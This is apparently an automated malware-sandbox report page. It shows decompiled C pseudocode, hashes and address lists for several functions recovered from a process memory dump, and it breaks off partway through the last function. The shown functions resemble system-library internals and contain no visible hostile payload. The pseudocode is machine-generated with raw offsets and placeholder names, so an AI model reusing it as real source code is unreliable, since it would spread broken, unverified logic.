Instruction ID: b33749ef1aaf6d438984d6258a52338c2ec5c3e4a3983575296a67dab02ca01d
Opcode Fuzzy Hash: 929d826ea2ba1e28e24d262e3b7aada714c4f9c5997ca15665382f5f662eb2c7
Instruction Fuzzy Hash: D0410F75A04718AFEF25DF24CD80BAAB7E9EB04604F0404E9E8059B280EB74FD81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04B94BAD, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E04B94BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x4c5d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E04B6CC50(_t86);
					L11:
					return E04BAB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x4c58504
				E04B82280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E04BAFA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E04BAB0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L04B84620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E04B6CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x4c58504
								E04B7FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E04B94F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x04b94bad
0x04b94bbf
0x04b94bc2
0x04b94bc6
0x04b94bcd
0x04b94bd9
0x04bd67fe
0x04bd6800
0x04b94ccc
0x04b94ccd
0x04b94cb7
0x04b94cc9
0x04b94cc9
0x04b94bdf
0x04b94be5
0x00000000
0x00000000
0x04b94beb
0x04b94bef
0x00000000
0x00000000
0x04b94bf5
0x04b94bf9
0x04b94c06
0x04b94c0b
0x04b94c17
0x04b94c1c
0x04b94c1f
0x04b94c25
0x04b94c33
0x04b94c3d
0x04b94c40
0x04b94c43
0x04b94c47
0x04b94c4d
0x04b94c53
0x04b94c54
0x04b94c55
0x04b94c56
0x04b94c5b
0x04b94c5c
0x04b94c63
0x04b94c6b
0x00000000
0x00000000
0x04bd6776
0x04bd6784
0x04bd6784
0x04bd679f
0x04bd67a7
0x04bd67af
0x04bd67ce
0x00000000
0x04bd67b1
0x04bd67b7
0x04bd67b8
0x04bd67c1
0x04bd67d3
0x04bd67d9
0x04bd67dd
0x04b94c94
0x04b94c94
0x04b94c98
0x04b94c9c
0x04b94ca3
0x04bd67f4
0x04bd67f4
0x04b94cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x04b94cb5
0x04b94c79
0x04b94c7e
0x04b94c89
0x04b94c8b
0x04b94c8f
0x04b94c8f
0x00000000
0x04b94c89
0x04bd67c3
0x00000000
0x04bd67c3
0x04bd67af
0x04b94c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d40c7e0aa8bad013dc078deeaf47d0aca3dc2e9eee3defa8c62e1d59082a14cd
Instruction ID: 71fd7b9d5da157d27a1933af0bb330e247104c47f59897d9cc2e149c0d999872
Opcode Fuzzy Hash: d40c7e0aa8bad013dc078deeaf47d0aca3dc2e9eee3defa8c62e1d59082a14cd
Instruction Fuzzy Hash: A8418F35A042289FDF21EF68C940BEA77B4EF45710F0105E9E908AB241EB74FE85CB95

Uniqueness

Uniqueness Score: -1.00%

Function 04B78A0A, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E04B78A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x4c5d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E04BAB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E04B7E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x4b41180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E04B91DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E04BA3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E04B78999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x04b78a0a
0x04b78a1c
0x04b78a23
0x04b78a2e
0x04b78a30
0x04b78a36
0x04b78a3c
0x04b78a3e
0x04b78a4a
0x04b78a52
0x04b78a9c
0x04b78aae
0x04b78a58
0x04b78a5e
0x04b78a6a
0x04b78a6f
0x04b78a75
0x04b78a7d
0x04b78a85
0x04b78a86
0x04b78a89
0x04b78a93
0x04b78a99
0x04b78a9b
0x00000000
0x04b78aaf
0x04b78abe
0x04b78ac3
0x04b78acb
0x04b78ad7
0x04b78ae0
0x04b78af1
0x00000000
0x04b78af1
0x04b78acd
0x04b78ad5
0x04b78afb
0x04b78afd
0x04b78aff
0x04b78b07
0x04b78b22
0x04b78b24
0x04b78b2a
0x04b78b2e
0x04b78b3f
0x04b78b78
0x04b78b41
0x04b78b52
0x04b78b54
0x04b78b5c
0x04b78b74
0x04b78b74
0x04b78b5c
0x04b78b3f
0x04b78b5e
0x04b78b61
0x04b78b64
0x04b78b64
0x04b78b6c
0x04b78b6c
0x04b78b11
0x04bc9cd5
0x04bc9cd5
0x04b78b17
0x04b78b1a
0x04b78b1a
0x00000000
0x04b78ad5
0x04b78a89

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab36e6bd7e3b279646392e22c4a82ff11ceda9e4ecfa0017a31c8dafa3132ceb
Instruction ID: b845fb8d3d8f0f2dbe89792787a54d40050248648dd374683f4df1137f702ab7
Opcode Fuzzy Hash: ab36e6bd7e3b279646392e22c4a82ff11ceda9e4ecfa0017a31c8dafa3132ceb
Instruction Fuzzy Hash: B34142B5A402289BDB24EF59CC8CAA9B7F4EF44304F1045EAD92997351E771AE81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04BE69A6, Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E04BE69A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x4c5d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L04B76C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E04BE6BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E04BA9980() >= 0) {
							E04B82280(_t56, 0x4c58778);
							_t77 = 1;
							_t68 = 1;
							if( *0x4c58774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x4c58774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E04B6B6F0(0x4b4c338, 0x4b4c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E04BA9520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E04BA95D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E04B7FFB0(_t68, _t77, 0x4c58778);
				}
				_pop(_t78);
				return E04BAB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x04be69b5
0x04be69be
0x04be69c3
0x04be69c9
0x04be69cc
0x04be69d1
0x04be69d3
0x04be69de
0x04be69e1
0x04be69ea
0x04be69f6
0x04be69fe
0x04be6a13
0x04be6a14
0x04be6a15
0x04be6a16
0x04be6a1e
0x04be6a26
0x04be6a31
0x04be6a36
0x04be6a37
0x04be6a40
0x04be6a49
0x04be6a4a
0x04be6a53
0x04be6a59
0x04be6a5d
0x04be6a5e
0x04be6a64
0x04be6a67
0x04be6a6a
0x04be6a6d
0x04be6a70
0x04be6a77
0x04be6a7d
0x04be6a86
0x04be6a89
0x04be6a9c
0x04be6a9f
0x04be6aa2
0x04be6aa5
0x04be6aaf
0x04be6ab1
0x04be6ab8
0x04be6ab9
0x04be6abb
0x04be6abe
0x04be6ac5
0x04be6ac5
0x04be6aaf
0x04be6a40
0x04be6a26
0x04be69fe
0x04be6ace
0x04be6ad0
0x04be6ad3
0x04be6ad8
0x04be6adf
0x04be6adf
0x04be6ae8
0x04be6aef
0x04be6aef
0x04be6af9
0x04be6b06

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbccf7a88d3de34ba637d033d8a2f9b79c6597528cad7e024c482bcb07897bd9
Instruction ID: eb16f69d3edce3d7797c7d12db3180a09055dc8abd93f5dd161f6c053aa9ea84
Opcode Fuzzy Hash: dbccf7a88d3de34ba637d033d8a2f9b79c6597528cad7e024c482bcb07897bd9
Instruction Fuzzy Hash: 2C41B2B1D003089FDB14DFA5C840BFEBBF8EF48714F0481A9E814A3250EB74A905DB50

Uniqueness

Uniqueness Score: -1.00%

Function 04B65210, Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E04B65210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E04B652A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E04BA95D0();
							L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E04B7EB70(_t54, 0x4c579a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E04BA95D0();
								L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E04B7EB70(_t54, 0x4c579a0);
						}
						return _t52;
					}
					L5:
					_t33 = E04BAF3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E04B7EB70(_t54, 0x4c579a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E04BA95D0();
							L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x04b65220
0x04b65224
0x04bc0d13
0x04bc0d16
0x04bc0d19
0x04b6522a
0x04b6522a
0x04b6522d
0x04b6522d
0x04b65231
0x04b65235
0x04b65239
0x04bc0d5c
0x04bc0d62
0x00000000
0x00000000
0x04bc0d6a
0x04bc0d7b
0x04bc0d7f
0x04bc0d81
0x04bc0d84
0x04bc0d95
0x04bc0d95
0x04bc0d6c
0x04bc0d71
0x04bc0d71
0x04bc0d9a
0x00000000
0x04b6524a
0x04b6524a
0x04b65250
0x04bc0d24
0x04bc0d35
0x04bc0d39
0x04bc0d3b
0x04bc0d3e
0x04bc0d50
0x04bc0d50
0x04bc0d26
0x04bc0d2b
0x04bc0d2b
0x00000000
0x04bc0d55
0x04b65256
0x04b6525b
0x04b65265
0x04bc0da7
0x04b6526b
0x04b6526e
0x04b65272
0x04bc0db1
0x04bc0db4
0x04bc0dc5
0x04bc0dc5
0x04b65272
0x04b65278
0x04b6527e
0x04b6528a
0x04b6528c
0x04b6528d
0x00000000
0x04b65280
0x04b65282
0x04b65288
0x04b6529f
0x04b65292
0x00000000
0x04b65292
0x00000000
0x04b65288
0x04b6527e

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1eea77b9a76fa9c626f1ab1ca4af139c9cc005427d4a16b2cf5ed2591abf371
Instruction ID: 6952fdf0258c9c916596a67c6e46177d195641a6c82fb30dcbc0ce8f67240670
Opcode Fuzzy Hash: c1eea77b9a76fa9c626f1ab1ca4af139c9cc005427d4a16b2cf5ed2591abf371
Instruction Fuzzy Hash: 3A310631251600EBDB31BF58DCC1B6677A6FF00764F114AEEE8260B1A4EB70F850EA90

Uniqueness

Uniqueness Score: -1.00%

Function 04BA3D43, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04BA3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E04B77B60(0, _t61, 0x4b411c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E04B77B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L04B84620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x04ba3d4c
0x04ba3d50
0x04ba3d55
0x04ba3d5e
0x04bde79a
0x00000000
0x04bde79a
0x04ba3d68
0x04bde789
0x04ba3d9d
0x04ba3da3
0x04ba3daf
0x04ba3db5
0x04ba3dbc
0x04ba3dc4
0x04ba3dc9
0x04ba3dce
0x04bde7ae
0x04bde7ae
0x04ba3dde
0x04ba3de2
0x04ba3de7
0x04ba3e0d
0x04ba3e13
0x04ba3e16
0x04ba3e1e
0x04ba3e25
0x04ba3e28
0x00000000
0x00000000
0x04ba3e2a
0x04ba3e2f
0x04ba3e37
0x04ba3e37
0x00000000
0x04ba3e37
0x04ba3e31
0x00000000
0x04ba3e31
0x04ba3e20
0x04ba3e20
0x04ba3e35
0x00000000
0x04ba3de9
0x04ba3de9
0x04ba3de9
0x04ba3dee
0x04ba3dfd
0x04ba3dff
0x04ba3e02
0x04ba3e05
0x04ba3e05
0x00000000
0x04ba3df0
0x04ba3de7
0x04bde78f
0x04bde794
0x04ba3d79
0x04ba3d84
0x04ba3d89
0x04ba3d8e
0x00000000
0x04bde7a4
0x04ba3d96
0x04ba3d9a
0x00000000
0x04ba3d9a
0x00000000
0x04bde794
0x04ba3d6e
0x04ba3d73
0x00000000
0x04bde7b5
0x00000000

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b8d3e88bd4cc8b5a066c6c9111252e19824b9e0b7e784f2917dfb44a0e2b2aa
Instruction ID: da3e606bfb77fde87dcca94c68ad8b7e3b64c617238025c6a269f77de98f104b
Opcode Fuzzy Hash: 2b8d3e88bd4cc8b5a066c6c9111252e19824b9e0b7e784f2917dfb44a0e2b2aa
Instruction Fuzzy Hash: A2319E31B09615DBD7258F29D841A6ABBE5EF95700B0594EAE889CB350F730E860E7A0

Uniqueness

Uniqueness Score: -1.00%

Function 04B9A61C, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E04B9A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x4c40220);
				E04BBD08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x4c57b9c; // 0x0
				_t55 = L04B84620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E04BBD0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x4c57b10 =  *0x4c57b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x4c5536c; // 0xa9ac68
					if( *_t51 != 0x4c55368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x4c55368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x4c5536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E04B9A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x04b9a61c
0x04b9a61e
0x04b9a623
0x04b9a628
0x04b9a62b
0x04b9a62d
0x04b9a648
0x04b9a64a
0x04b9a64f
0x04bd9b44
0x04b9a6ec
0x04b9a6f1
0x04b9a6f1
0x04b9a655
0x04b9a657
0x04b9a65a
0x04b9a65d
0x04b9a662
0x04b9a663
0x04b9a667
0x04b9a668
0x04b9a66d
0x04b9a706
0x04b9a706
0x04bd9bda
0x04bd9be6
0x04bd9beb
0x00000000
0x04bd9beb
0x04b9a679
0x04bd9b7a
0x00000000
0x04bd9b7a
0x04b9a683
0x04b9a6f4
0x04b9a6f7
0x04b9a6f9
0x04b9a6fd
0x04b9a6a0
0x04b9a6a0
0x04b9a6ad
0x04b9a6af
0x04b9a6b4
0x04bd9ba7
0x04bd9bac
0x00000000
0x00000000
0x04bd9bc6
0x04bd9bce
0x04bd9bd1
0x04bd9bd3
0x04bd9bd3
0x00000000
0x04bd9bd1
0x04b9a6bd
0x04b9a6c3
0x04b9a6c6
0x04b9a6d2
0x04b9a701
0x04b9a704
0x00000000
0x04b9a704
0x04b9a6d4
0x04b9a6d6
0x04b9a6d9
0x04b9a6db
0x04b9a6e1
0x04b9a6e6
0x04b9a6e8
0x04b9a6e8
0x04b9a6ea
0x00000000
0x04b9a6ea
0x04b9a688
0x04b9a692
0x04b9a694
0x04b9a699
0x00000000
0x00000000
0x04b9a69d
0x00000000

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b13d149e955ca836cfd1411fcd8c88ec39f257cb508844fba907710e3f1b49a3
Instruction ID: 10188f2b25c5f907b9626101064d3fa438da168024b02feeaaebb3d9aa554323
Opcode Fuzzy Hash: b13d149e955ca836cfd1411fcd8c88ec39f257cb508844fba907710e3f1b49a3
Instruction Fuzzy Hash: D94136B5A00255DFDF14CF68D890BA9BBF1FF49314F1580A9E819AB384D778AD41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04BE7016, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E04BE7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
